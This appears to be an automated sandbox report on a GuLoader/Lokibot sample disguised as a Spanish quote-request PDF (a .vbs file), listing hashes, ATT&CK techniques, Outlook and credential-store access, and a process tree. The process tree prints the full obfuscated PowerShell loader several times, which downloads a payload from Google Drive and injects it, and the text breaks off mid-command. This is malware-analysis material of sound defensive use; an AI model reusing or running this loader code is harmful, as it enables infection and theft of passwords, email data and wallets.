guloader | 5818113aece5656d63337a40653b949023f5bd9d51a9212a8733504e3a5e7803

General

Target

SOLICITUD DE PRESUPUESTO 09-16-2024·pdf.vbs
Size

41KB
MD5

7e4ddcf544043887aa681f00f4d88411
SHA1

cbfea2438100a9bae01a06ccc73b06d51ace1626
SHA256

132bb6c4728aa2754b10523a06e1d6ad4b571b59a3821c2baef81210d136d30d
SHA512

e0156be04e9af473941eb289304a86f03cc77ae0d1d8bb90096ded7291dc6ebb149796f7f296f10e2c38a778a9c23ea322f541b2a27e6ae9dd2f7fbf9f726bab
SSDEEP

384:Z9vOg3no0bPtRwN8Zb8BO7kLkpUJX4T2vz9xboQ8VfiQZykwNDG2R050v2r6Fuo3:Zp3nhaM+JzXgKQYYx9o7V

Score

10^/10

guloader lokibot collection credential_access discovery downloader spyware stealer trojan

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2356	powershell.exe
7	2356	powershell.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	wabmig.exe
Key opened	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	wabmig.exe
Key opened	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	wabmig.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
4	drive.google.com
5	drive.google.com
9	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
2308	wabmig.exe
2308	wabmig.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2740	powershell.exe
2308	wabmig.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2740 set thread context of 2308	2740	powershell.exe	38

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wabmig.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2740	powershell.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2356	powershell.exe
2740	powershell.exe
2740	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2740	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2356	powershell.exe
Token: SeDebugPrivilege	2740	powershell.exe
Token: SeDebugPrivilege	2308	wabmig.exe

Suspicious use of WriteProcessMemory 23 IoCs

description	pid	Process	procid_target
PID 2532 wrote to memory of 2356	2532	WScript.exe	30
PID 2532 wrote to memory of 2356	2532	WScript.exe	30
PID 2532 wrote to memory of 2356	2532	WScript.exe	30
PID 2356 wrote to memory of 1320	2356	powershell.exe	32
PID 2356 wrote to memory of 1320	2356	powershell.exe	32
PID 2356 wrote to memory of 1320	2356	powershell.exe	32
PID 2356 wrote to memory of 1800	2356	powershell.exe	35
PID 2356 wrote to memory of 1800	2356	powershell.exe	35
PID 2356 wrote to memory of 1800	2356	powershell.exe	35
PID 1800 wrote to memory of 2740	1800	cmd.exe	36
PID 1800 wrote to memory of 2740	1800	cmd.exe	36
PID 1800 wrote to memory of 2740	1800	cmd.exe	36
PID 1800 wrote to memory of 2740	1800	cmd.exe	36
PID 2740 wrote to memory of 2604	2740	powershell.exe	37
PID 2740 wrote to memory of 2604	2740	powershell.exe	37
PID 2740 wrote to memory of 2604	2740	powershell.exe	37
PID 2740 wrote to memory of 2604	2740	powershell.exe	37
PID 2740 wrote to memory of 2308	2740	powershell.exe	38
PID 2740 wrote to memory of 2308	2740	powershell.exe	38
PID 2740 wrote to memory of 2308	2740	powershell.exe	38
PID 2740 wrote to memory of 2308	2740	powershell.exe	38
PID 2740 wrote to memory of 2308	2740	powershell.exe	38
PID 2740 wrote to memory of 2308	2740	powershell.exe	38

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	wabmig.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	wabmig.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SOLICITUD DE PRESUPUESTO 09-16-2024·pdf.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2532
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Chelydroid Congregator Dyes #>;$Ordinatvrdierne='Revyernes';<#Fngslingernes Tillb Markedsdeltagere #>;$Mlkevej=$host.PrivateData;If ($Mlkevej) {$Fortificere++;}function Brokfugle($Meteoropathologic){$Udsorteringen=$Meteoropathologic.Length-$Fortificere;for( $Grillristens=5;$Grillristens -lt $Udsorteringen;$Grillristens+=6){$Superexistent+=$Meteoropathologic[$Grillristens];}$Superexistent;}function Undergrounds($Sallies){ . ($Proportioning1) ($Sallies);}$Pretenced=Brokfugle '.avneMPos toPearlzScheeiHo ril Slv lObjeca Outc/Brack5 Toss.Dervr0suspe Retsv(GulfiWGeneriSixpenMatutdBekymo S udw El msCoif, Brum NPe anTDhole Deerf1 ueb0Stuvn.Verge0 .atr;Flles RetsfWEnroli GrnnnSynd.6Aktie4 Shri; Stut oraxKrykk6M sse4 Arse;Lokke LorenrKilervPrivi:Noni 1 Serv2 H nd1Selvc.Njals0No.pr)Dryss E.patGBarhoeCom icPala.kI.teroDi xo/Genne2 Epo 0Corbl1Matth0 omg0Hedes1No.de0Repro1 R pr KonkuFToleriMfindrb rkie Klagf Fabro,ichax avat/Jinn 1volds2 Rela1No pe. brag0Gilpy ';$Trienes=Brokfugle 'Her tuUni,ts AegaeTegnfR Stry-BjergASnabegSlan.EmisnunPlej.t Id n ';$remplacer=Brokfugle ' MicrhMu.hrtDeveltS rivpJournsTigg.:Disse/Sylph/ B ncd Sr er NoneiSuperv,iddoePh.rm.Biankg Tho,oConjuo vejsg GirdlparleeSkim,.Rib ecGummaoOphjnmOvera/.ersouAdoptc Tetr?TvineekenotxUdaanpTvangoFasttrMerrytDobb.=Man.gdJagtroPablowR.sinnTve el SandoUnderaBesrgdHatem&UnmoviPirued acet= Tilb1Mo,olEOve.aeDiskoKStign- Reta1Factoc S lspSolidhT rriCYmpefqembattFje dcEkspeeLam e8ProscxImphebAnsttQ Et bABreecE InteBAnmeluRanv XUntop0Statsh ron1 I prQLandlQSmg.rRIndicI DataTTurquqA.veneOr tl ';$Rhabdomonas=Brokfugle 'Anlbs>Lugtg ';$Proportioning1=Brokfugle 'KailyICl tteVoiciXswigs ';$Eksportaktivitetens='Slagmarkens';$Hyldeblomst226 = Brokfugle 'ManteeFortoc,kruehVanlio ulsl Tenni%respea AmpupBatukpSilkedN jeraH stit Trouarotte%Forbi\NonilmCitt i HudalPand,i.raveeAfb gupilfirKirkle gy.at kovstCubiceudjaer Ox.ln BomoeReco,.DicemK.etwaaFine.kDoors Hderl&Ldpas& Tril Unquee FrekcRustrhTerapoA mag Akad,tVagin ';Undergrounds (Brokfugle ' tr,n$ PlumgF ernlAkupuoscabrb GubeaTubinl Sidd:Jyd.pFA lenuOrnitlso ifdHaqueeK,ethnTet ndHj eme Over=Zagre(QuodlcCo tam Fored .ttr Teeto/Roma,cC rvi M ner$PapemHThresyLinjel U crdKor,eeHornebRugbrlEgefao FormmDema sHu,lrtunent2Handw2Slewe6 esen)Unr c ');Undergrounds (Brokfugle 'Terpe$OrchegHalvvl nathoFlotibturneaDell lSolen:uds,aBTransiAnchirKlvnig StoriTa estOmnist FlatiAnvennSortheI tenrVoksee ornsChest= Rust$Kissmr.andae hrysm B llp T anlAfdr,aJunk cSkrifeEnspnr Pecu. Vends SoubpHusd.lHer diNonadtDryss(Storm$Mul nR Humphcephaa Irksb,anicdisonioCollemPleuro NonpnOpst aM.riksAttri)Fugef ');Undergrounds (Brokfugle 'Muske[Uni tN eblueDumbetSebor.Hess S TrlaebamburTitulvIndbii ekscBetaseIdeenP chokoFru ti nconnVela tAr slMSamm.aOndulnFaldbaFin lg UnfaeAscenr asom]Parl :S,ept:CalcaSDimmeeduckwcDiss,u PyrorDisc iSteret SublyhousePUnderrR nneoSynketOver o.rbancH mero andelCente in r= Klan Asper[LimedNLaughe eratt Peri. P ddSpha meHjtelc CfiruSvirprb osoiBa,letbr ndyMisfaPforlarTemeroAtr.rtUndupoFrilucTaleho P.otlOdyssTProvoyD.ryap TacteVandk]Pichu:Thure:BeautT MenglQua.estaktl1P ten2Inter ');$remplacer=$Birgittineres[0];$Fedtparadoks= (Brokfugle 'Unsai$P,islgLandbl SkilOD akobCaptiaUmu,iLbesla:Repulb Do mr RestI DumrNBara k ekanETilba= ConinBl kpe Mod wMaren-HelliOForbrbCep aJTebree Remoc Ce ttRugek ProffSUntreY Fe lSHva,rtBles ejuvelmOvera.ByggenStablEAfkriTTenni.gr,llwRe tbeUnmelB ImpuCpreselAdvo iFickleFincanSl.raT');$Fedtparadoks+=$Fuldende[1];Undergrounds ($Fedtparadoks);Undergrounds (Brokfugle 'sprug$Tekstb Amp rNondii idacn DyrekKrakeeSilde.UdkigHParageDictiaOverbdCoveneStranrSemaes gley[Bolsj$UndtaTPoll,r Selvi Yenie,oncon apreHusbosNovia]Skuff=Elekt$ AutoPTavserkn,eleCellutIsarie leganA,rorcDegr ec armd Pavs ');$Unlustie=Brokfugle 'Alpha$hummeb prarCongriPargenByst kVoicee Unna. ScapDSten,o Rd gwPas onMagtflP epao osenaCau edKewpiF BettiForbilPoo retemp.(.rush$H mosrUnarbe SubcmAcacapBemaelRetlia.npoac Sl teHemitrPtero, Unan$ Bu,yMLibrauSljfelMo,tat P nti StertKon eu,astsbU.ageePosserDorm.cDeleguasseml NetvaHaematAlgocaPrg i)Blaan ';$Multituberculata=$Fuldende[0];Undergrounds (Brokfugle 'Inden$LevangvelseLDotteoPhiloBKimona puduLOlib :staalmFysi aFrankaEn.elnLiquaEDrmm.dAustasRigmnNOutmaaPhiloVSupernNon,uEAa eaNTv stEGio,d=C.tiz(AurocTStrygE HoveSredeft Matr-Broodp OutpaRg,omtUnhidhPerox Slo $Perfem IsopUMultilEn het ooniI,oborT VellUBro.tb KameER,altRBeskyc lounu Ae.olSolsoa Tendt DesmAfolkt) Morg ');while (!$Maanedsnavnene) {Undergrounds (Brokfugle 'Fo.lb$CordegUgleplHovedoTox fbSlu pabyl,elMehta:KentlOUforssbiofocGaditiWeedalSenatlDavace mi rr evike,edarr Hydr=Renc $AmatrtTankerArithuForvie Pros ') ;Undergrounds $Unlustie;Undergrounds (Brokfugle 'DiffeSD,miat .dkla hatcrBonm,tlamae-,huntSMesollMar ieTopsteQuattpRe en Teni.4 Sere ');Undergrounds (Brokfugle 'Landi$LovemgP.seklKev.noOphicbdermaa SovelG dst:pseudM LeadaCorboaCandlnBaunge B erdYderpsZwec nBe eea Ste vlowbrnAkilleCrustnS adseDusac=Hjrem(DemokTGensie,tencsCarelt Pol -TeisbP NatiaPulp tPalath Slas Pe,ma$A,itaMoverwu P.delUndert oncoiasmuntKoketuGagerbSprogeRenssr aldcImpreuZarislTi,traEkstet onia umbr) R.me ') ;Undergrounds (Brokfugle 'At ar$Br degTutenl bejdoEncrubUdradaN ckwlKuldk:IatroUUsdelrCh,leeTelefdMin,ie.rimol SyntiAlfa gKlagehFusioe ammed dmejeTapotrtrian2 iddl5Patin3Huggi=gymna$Sylv g StorlChamaoTiletbH lleaStatelGynia: Out.fTha soDamnarV racb Ha,mrSkrhauopvargLachreViderrF rbumExtiro Jourt Am li HorovBogoreSplinrAada i R tsnSog egPreheeAllonnPharmsTrans+Menne+Ward %Helot$TawdrBTi,cti PengrPla.dg ,otoiPro ot.rillt Besei Prewn Pel eSladdr Opu,eBleg,sPanto.Aftonciambko Phytu LgtenFirebt P,es ') ;$remplacer=$Birgittineres[$Uredeligheder253];}$Kildetekst=347054;$Combing=28457;Undergrounds (Brokfugle ' Udfa$A yatgKlasslSt luoAurocb RaadaReflelSmelt:BetonMMarkroBesladFahretSevrdaTabitgHi epe StifaRadionIdepolHelsigMax ls Poly Nonsp=Attra StemnG Spaae sammtho er-UdklkC UnvaoSurd.n TorfttirosePay,en ColltTeneb ort$TarteMLiomyuFremtl Kn ttArbejiLys,ntggebguFascib BlodeUnderrWhe lc K lkuAbsenl IncoaKor,htPrst aUndun ');Undergrounds (Brokfugle 'Nonas$ProavgObsidllappeobibcob Gr.baFlleslSemiv:LaengKRigesrUudtmy KkkedA,natsUmptei OkselPrte dZoproeIdiocnUskad1Advok5Cradl3Asylr Kuleg= kinn Overr[ ndelS,ntelySubpesNon atwistoeHexa mAntag.StatsC,rejloOffennMyoatvDevase Sal rp erotIsvin]Medic:Cyclo:SydafFLeukorPointoErnyam KramBSubcoaSicilsBonseeSegme6Whiff4GunvoSPreistSvi trTilraiGiftsn oyetgrante(Skden$InterMMangloSpis,d rogntTrisaasmakkg Terce B,rtaBa,innVolatlfastagAfrunsVov,l) Pi r ');Undergrounds (Brokfugle 'Cisju$Expergp loclRafl.o MisebTriplaJoloalOverb:B uesSPr hayRangemCul iaAdj nsRespekAn,teiCecidnUnpioeMiscisSepar Pewte= acti Hexob[UnderS DeciyVicersPhonotLim,aeLetf m ecov.BonmoT Op.yeKamrex Thert Emis.IsolaEPrebonInfracBaggroQuippd Ala.iUtugtnAlarmgM lds] S mm:Behan:Klok.A PreaSAne oCTill.IChambIEmanc. NvniGSnu,peCounttPyromS CrootOvercrStatuisirinn oalgFilt ( rval$BunseK MetarTungmy aculdI.dsksDaalaiFor,alJ lefd PreieStudenl.mph1Reobt5Daunt3 Boli) Tska ');Undergrounds (Brokfugle ' Slvs$Fluesg Ekahl L.ziounspab eutia En.ml B me:BebopOMortipSamkviSupersRegretEkstrhNervuoBradyc TiggoNammom Refei,ervad yppea Schnen.vem= Tilg$D sgoSStillyafstamFrdigaCh rosPractkNedruiLaanenni.ole etscsde mi.RoutosSmedeuBa pebOptagsSlyngtMi.rorReguiiUnelenIn regVskes(Hedeb$I dgaK grapiForudlSol,edCen reUninttsporeePen ukTrom sLe hetExpen,Unint$WaistC UindoReviemOwldobAden iGullanslettgDigly)Deedi ');Undergrounds $Opisthocomidae;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2356
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\milieuretterne.Kak && echo t"
    3⤵
    PID:1320
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Chelydroid Congregator Dyes #>;$Ordinatvrdierne='Revyernes';<#Fngslingernes Tillb Markedsdeltagere #>;$Mlkevej=$host.PrivateData;If ($Mlkevej) {$Fortificere++;}function Brokfugle($Meteoropathologic){$Udsorteringen=$Meteoropathologic.Length-$Fortificere;for( $Grillristens=5;$Grillristens -lt $Udsorteringen;$Grillristens+=6){$Superexistent+=$Meteoropathologic[$Grillristens];}$Superexistent;}function Undergrounds($Sallies){ . ($Proportioning1) ($Sallies);}$Pretenced=Brokfugle '.avneMPos toPearlzScheeiHo ril Slv lObjeca Outc/Brack5 Toss.Dervr0suspe Retsv(GulfiWGeneriSixpenMatutdBekymo S udw El msCoif, Brum NPe anTDhole Deerf1 ueb0Stuvn.Verge0 .atr;Flles RetsfWEnroli GrnnnSynd.6Aktie4 Shri; Stut oraxKrykk6M sse4 Arse;Lokke LorenrKilervPrivi:Noni 1 Serv2 H nd1Selvc.Njals0No.pr)Dryss E.patGBarhoeCom icPala.kI.teroDi xo/Genne2 Epo 0Corbl1Matth0 omg0Hedes1No.de0Repro1 R pr KonkuFToleriMfindrb rkie Klagf Fabro,ichax avat/Jinn 1volds2 Rela1No pe. brag0Gilpy ';$Trienes=Brokfugle 'Her tuUni,ts AegaeTegnfR Stry-BjergASnabegSlan.EmisnunPlej.t Id n ';$remplacer=Brokfugle ' MicrhMu.hrtDeveltS rivpJournsTigg.:Disse/Sylph/ B ncd Sr er NoneiSuperv,iddoePh.rm.Biankg Tho,oConjuo vejsg GirdlparleeSkim,.Rib ecGummaoOphjnmOvera/.ersouAdoptc Tetr?TvineekenotxUdaanpTvangoFasttrMerrytDobb.=Man.gdJagtroPablowR.sinnTve el SandoUnderaBesrgdHatem&UnmoviPirued acet= Tilb1Mo,olEOve.aeDiskoKStign- Reta1Factoc S lspSolidhT rriCYmpefqembattFje dcEkspeeLam e8ProscxImphebAnsttQ Et bABreecE InteBAnmeluRanv XUntop0Statsh ron1 I prQLandlQSmg.rRIndicI DataTTurquqA.veneOr tl ';$Rhabdomonas=Brokfugle 'Anlbs>Lugtg ';$Proportioning1=Brokfugle 'KailyICl tteVoiciXswigs ';$Eksportaktivitetens='Slagmarkens';$Hyldeblomst226 = Brokfugle 'ManteeFortoc,kruehVanlio ulsl Tenni%respea AmpupBatukpSilkedN jeraH stit Trouarotte%Forbi\NonilmCitt i HudalPand,i.raveeAfb gupilfirKirkle gy.at kovstCubiceudjaer Ox.ln BomoeReco,.DicemK.etwaaFine.kDoors Hderl&Ldpas& Tril Unquee FrekcRustrhTerapoA mag Akad,tVagin ';Undergrounds (Brokfugle ' tr,n$ PlumgF ernlAkupuoscabrb GubeaTubinl Sidd:Jyd.pFA lenuOrnitlso ifdHaqueeK,ethnTet ndHj eme Over=Zagre(QuodlcCo tam Fored .ttr Teeto/Roma,cC rvi M ner$PapemHThresyLinjel U crdKor,eeHornebRugbrlEgefao FormmDema sHu,lrtunent2Handw2Slewe6 esen)Unr c ');Undergrounds (Brokfugle 'Terpe$OrchegHalvvl nathoFlotibturneaDell lSolen:uds,aBTransiAnchirKlvnig StoriTa estOmnist FlatiAnvennSortheI tenrVoksee ornsChest= Rust$Kissmr.andae hrysm B llp T anlAfdr,aJunk cSkrifeEnspnr Pecu. Vends SoubpHusd.lHer diNonadtDryss(Storm$Mul nR Humphcephaa Irksb,anicdisonioCollemPleuro NonpnOpst aM.riksAttri)Fugef ');Undergrounds (Brokfugle 'Muske[Uni tN eblueDumbetSebor.Hess S TrlaebamburTitulvIndbii ekscBetaseIdeenP chokoFru ti nconnVela tAr slMSamm.aOndulnFaldbaFin lg UnfaeAscenr asom]Parl :S,ept:CalcaSDimmeeduckwcDiss,u PyrorDisc iSteret SublyhousePUnderrR nneoSynketOver o.rbancH mero andelCente in r= Klan Asper[LimedNLaughe eratt Peri. P ddSpha meHjtelc CfiruSvirprb osoiBa,letbr ndyMisfaPforlarTemeroAtr.rtUndupoFrilucTaleho P.otlOdyssTProvoyD.ryap TacteVandk]Pichu:Thure:BeautT MenglQua.estaktl1P ten2Inter ');$remplacer=$Birgittineres[0];$Fedtparadoks= (Brokfugle 'Unsai$P,islgLandbl SkilOD akobCaptiaUmu,iLbesla:Repulb Do mr RestI DumrNBara k ekanETilba= ConinBl kpe Mod wMaren-HelliOForbrbCep aJTebree Remoc Ce ttRugek ProffSUntreY Fe lSHva,rtBles ejuvelmOvera.ByggenStablEAfkriTTenni.gr,llwRe tbeUnmelB ImpuCpreselAdvo iFickleFincanSl.raT');$Fedtparadoks+=$Fuldende[1];Undergrounds ($Fedtparadoks);Undergrounds (Brokfugle 'sprug$Tekstb Amp rNondii idacn DyrekKrakeeSilde.UdkigHParageDictiaOverbdCoveneStranrSemaes gley[Bolsj$UndtaTPoll,r Selvi Yenie,oncon apreHusbosNovia]Skuff=Elekt$ AutoPTavserkn,eleCellutIsarie leganA,rorcDegr ec armd Pavs ');$Unlustie=Brokfugle 'Alpha$hummeb prarCongriPargenByst kVoicee Unna. ScapDSten,o Rd gwPas onMagtflP epao osenaCau edKewpiF BettiForbilPoo retemp.(.rush$H mosrUnarbe SubcmAcacapBemaelRetlia.npoac Sl teHemitrPtero, Unan$ Bu,yMLibrauSljfelMo,tat P nti StertKon eu,astsbU.ageePosserDorm.cDeleguasseml NetvaHaematAlgocaPrg i)Blaan ';$Multituberculata=$Fuldende[0];Undergrounds (Brokfugle 'Inden$LevangvelseLDotteoPhiloBKimona puduLOlib :staalmFysi aFrankaEn.elnLiquaEDrmm.dAustasRigmnNOutmaaPhiloVSupernNon,uEAa eaNTv stEGio,d=C.tiz(AurocTStrygE HoveSredeft Matr-Broodp OutpaRg,omtUnhidhPerox Slo $Perfem IsopUMultilEn het ooniI,oborT VellUBro.tb KameER,altRBeskyc lounu Ae.olSolsoa Tendt DesmAfolkt) Morg ');while (!$Maanedsnavnene) {Undergrounds (Brokfugle 'Fo.lb$CordegUgleplHovedoTox fbSlu pabyl,elMehta:KentlOUforssbiofocGaditiWeedalSenatlDavace mi rr evike,edarr Hydr=Renc $AmatrtTankerArithuForvie Pros ') ;Undergrounds $Unlustie;Undergrounds (Brokfugle 'DiffeSD,miat .dkla hatcrBonm,tlamae-,huntSMesollMar ieTopsteQuattpRe en Teni.4 Sere ');Undergrounds (Brokfugle 'Landi$LovemgP.seklKev.noOphicbdermaa SovelG dst:pseudM LeadaCorboaCandlnBaunge B erdYderpsZwec nBe eea Ste vlowbrnAkilleCrustnS adseDusac=Hjrem(DemokTGensie,tencsCarelt Pol -TeisbP NatiaPulp tPalath Slas Pe,ma$A,itaMoverwu P.delUndert oncoiasmuntKoketuGagerbSprogeRenssr aldcImpreuZarislTi,traEkstet onia umbr) R.me ') ;Undergrounds (Brokfugle 'At ar$Br degTutenl bejdoEncrubUdradaN ckwlKuldk:IatroUUsdelrCh,leeTelefdMin,ie.rimol SyntiAlfa gKlagehFusioe ammed dmejeTapotrtrian2 iddl5Patin3Huggi=gymna$Sylv g StorlChamaoTiletbH lleaStatelGynia: Out.fTha soDamnarV racb Ha,mrSkrhauopvargLachreViderrF rbumExtiro Jourt Am li HorovBogoreSplinrAada i R tsnSog egPreheeAllonnPharmsTrans+Menne+Ward %Helot$TawdrBTi,cti PengrPla.dg ,otoiPro ot.rillt Besei Prewn Pel eSladdr Opu,eBleg,sPanto.Aftonciambko Phytu LgtenFirebt P,es ') ;$remplacer=$Birgittineres[$Uredeligheder253];}$Kildetekst=347054;$Combing=28457;Undergrounds (Brokfugle ' Udfa$A yatgKlasslSt luoAurocb RaadaReflelSmelt:BetonMMarkroBesladFahretSevrdaTabitgHi epe StifaRadionIdepolHelsigMax ls Poly Nonsp=Attra StemnG Spaae sammtho er-UdklkC UnvaoSurd.n TorfttirosePay,en ColltTeneb ort$TarteMLiomyuFremtl Kn ttArbejiLys,ntggebguFascib BlodeUnderrWhe lc K lkuAbsenl IncoaKor,htPrst aUndun ');Undergrounds (Brokfugle 'Nonas$ProavgObsidllappeobibcob Gr.baFlleslSemiv:LaengKRigesrUudtmy KkkedA,natsUmptei OkselPrte dZoproeIdiocnUskad1Advok5Cradl3Asylr Kuleg= kinn Overr[ ndelS,ntelySubpesNon atwistoeHexa mAntag.StatsC,rejloOffennMyoatvDevase Sal rp erotIsvin]Medic:Cyclo:SydafFLeukorPointoErnyam KramBSubcoaSicilsBonseeSegme6Whiff4GunvoSPreistSvi trTilraiGiftsn oyetgrante(Skden$InterMMangloSpis,d rogntTrisaasmakkg Terce B,rtaBa,innVolatlfastagAfrunsVov,l) Pi r ');Undergrounds (Brokfugle 'Cisju$Expergp loclRafl.o MisebTriplaJoloalOverb:B uesSPr hayRangemCul iaAdj nsRespekAn,teiCecidnUnpioeMiscisSepar Pewte= acti Hexob[UnderS DeciyVicersPhonotLim,aeLetf m ecov.BonmoT Op.yeKamrex Thert Emis.IsolaEPrebonInfracBaggroQuippd Ala.iUtugtnAlarmgM lds] S mm:Behan:Klok.A PreaSAne oCTill.IChambIEmanc. NvniGSnu,peCounttPyromS CrootOvercrStatuisirinn oalgFilt ( rval$BunseK MetarTungmy aculdI.dsksDaalaiFor,alJ lefd PreieStudenl.mph1Reobt5Daunt3 Boli) Tska ');Undergrounds (Brokfugle ' Slvs$Fluesg Ekahl L.ziounspab eutia En.ml B me:BebopOMortipSamkviSupersRegretEkstrhNervuoBradyc TiggoNammom Refei,ervad yppea Schnen.vem= Tilg$D sgoSStillyafstamFrdigaCh rosPractkNedruiLaanenni.ole etscsde mi.RoutosSmedeuBa pebOptagsSlyngtMi.rorReguiiUnelenIn regVskes(Hedeb$I dgaK grapiForudlSol,edCen reUninttsporeePen ukTrom sLe hetExpen,Unint$WaistC UindoReviemOwldobAden iGullanslettgDigly)Deedi ');Undergrounds $Opisthocomidae;"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1800
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Chelydroid Congregator Dyes #>;$Ordinatvrdierne='Revyernes';<#Fngslingernes Tillb Markedsdeltagere #>;$Mlkevej=$host.PrivateData;If ($Mlkevej) {$Fortificere++;}function Brokfugle($Meteoropathologic){$Udsorteringen=$Meteoropathologic.Length-$Fortificere;for( $Grillristens=5;$Grillristens -lt $Udsorteringen;$Grillristens+=6){$Superexistent+=$Meteoropathologic[$Grillristens];}$Superexistent;}function Undergrounds($Sallies){ . ($Proportioning1) ($Sallies);}$Pretenced=Brokfugle '.avneMPos toPearlzScheeiHo ril Slv lObjeca Outc/Brack5 Toss.Dervr0suspe Retsv(GulfiWGeneriSixpenMatutdBekymo S udw El msCoif, Brum NPe anTDhole Deerf1 ueb0Stuvn.Verge0 .atr;Flles RetsfWEnroli GrnnnSynd.6Aktie4 Shri; Stut oraxKrykk6M sse4 Arse;Lokke LorenrKilervPrivi:Noni 1 Serv2 H nd1Selvc.Njals0No.pr)Dryss E.patGBarhoeCom icPala.kI.teroDi xo/Genne2 Epo 0Corbl1Matth0 omg0Hedes1No.de0Repro1 R pr KonkuFToleriMfindrb rkie Klagf Fabro,ichax avat/Jinn 1volds2 Rela1No pe. brag0Gilpy ';$Trienes=Brokfugle 'Her tuUni,ts AegaeTegnfR Stry-BjergASnabegSlan.EmisnunPlej.t Id n ';$remplacer=Brokfugle ' MicrhMu.hrtDeveltS rivpJournsTigg.:Disse/Sylph/ B ncd Sr er NoneiSuperv,iddoePh.rm.Biankg Tho,oConjuo vejsg GirdlparleeSkim,.Rib ecGummaoOphjnmOvera/.ersouAdoptc Tetr?TvineekenotxUdaanpTvangoFasttrMerrytDobb.=Man.gdJagtroPablowR.sinnTve el SandoUnderaBesrgdHatem&UnmoviPirued acet= Tilb1Mo,olEOve.aeDiskoKStign- Reta1Factoc S lspSolidhT rriCYmpefqembattFje dcEkspeeLam e8ProscxImphebAnsttQ Et bABreecE InteBAnmeluRanv XUntop0Statsh ron1 I prQLandlQSmg.rRIndicI DataTTurquqA.veneOr tl ';$Rhabdomonas=Brokfugle 'Anlbs>Lugtg ';$Proportioning1=Brokfugle 'KailyICl tteVoiciXswigs ';$Eksportaktivitetens='Slagmarkens';$Hyldeblomst226 = Brokfugle 'ManteeFortoc,kruehVanlio ulsl Tenni%respea AmpupBatukpSilkedN jeraH stit Trouarotte%Forbi\NonilmCitt i HudalPand,i.raveeAfb gupilfirKirkle gy.at kovstCubiceudjaer Ox.ln BomoeReco,.DicemK.etwaaFine.kDoors Hderl&Ldpas& Tril Unquee FrekcRustrhTerapoA mag Akad,tVagin ';Undergrounds (Brokfugle ' tr,n$ PlumgF ernlAkupuoscabrb GubeaTubinl Sidd:Jyd.pFA lenuOrnitlso ifdHaqueeK,ethnTet ndHj eme Over=Zagre(QuodlcCo tam Fored .ttr Teeto/Roma,cC rvi M ner$PapemHThresyLinjel U crdKor,eeHornebRugbrlEgefao FormmDema sHu,lrtunent2Handw2Slewe6 esen)Unr c ');Undergrounds (Brokfugle 'Terpe$OrchegHalvvl nathoFlotibturneaDell lSolen:uds,aBTransiAnchirKlvnig StoriTa estOmnist FlatiAnvennSortheI tenrVoksee ornsChest= Rust$Kissmr.andae hrysm B llp T anlAfdr,aJunk cSkrifeEnspnr Pecu. Vends SoubpHusd.lHer diNonadtDryss(Storm$Mul nR Humphcephaa Irksb,anicdisonioCollemPleuro NonpnOpst aM.riksAttri)Fugef ');Undergrounds (Brokfugle 'Muske[Uni tN eblueDumbetSebor.Hess S TrlaebamburTitulvIndbii ekscBetaseIdeenP chokoFru ti nconnVela tAr slMSamm.aOndulnFaldbaFin lg UnfaeAscenr asom]Parl :S,ept:CalcaSDimmeeduckwcDiss,u PyrorDisc iSteret SublyhousePUnderrR nneoSynketOver 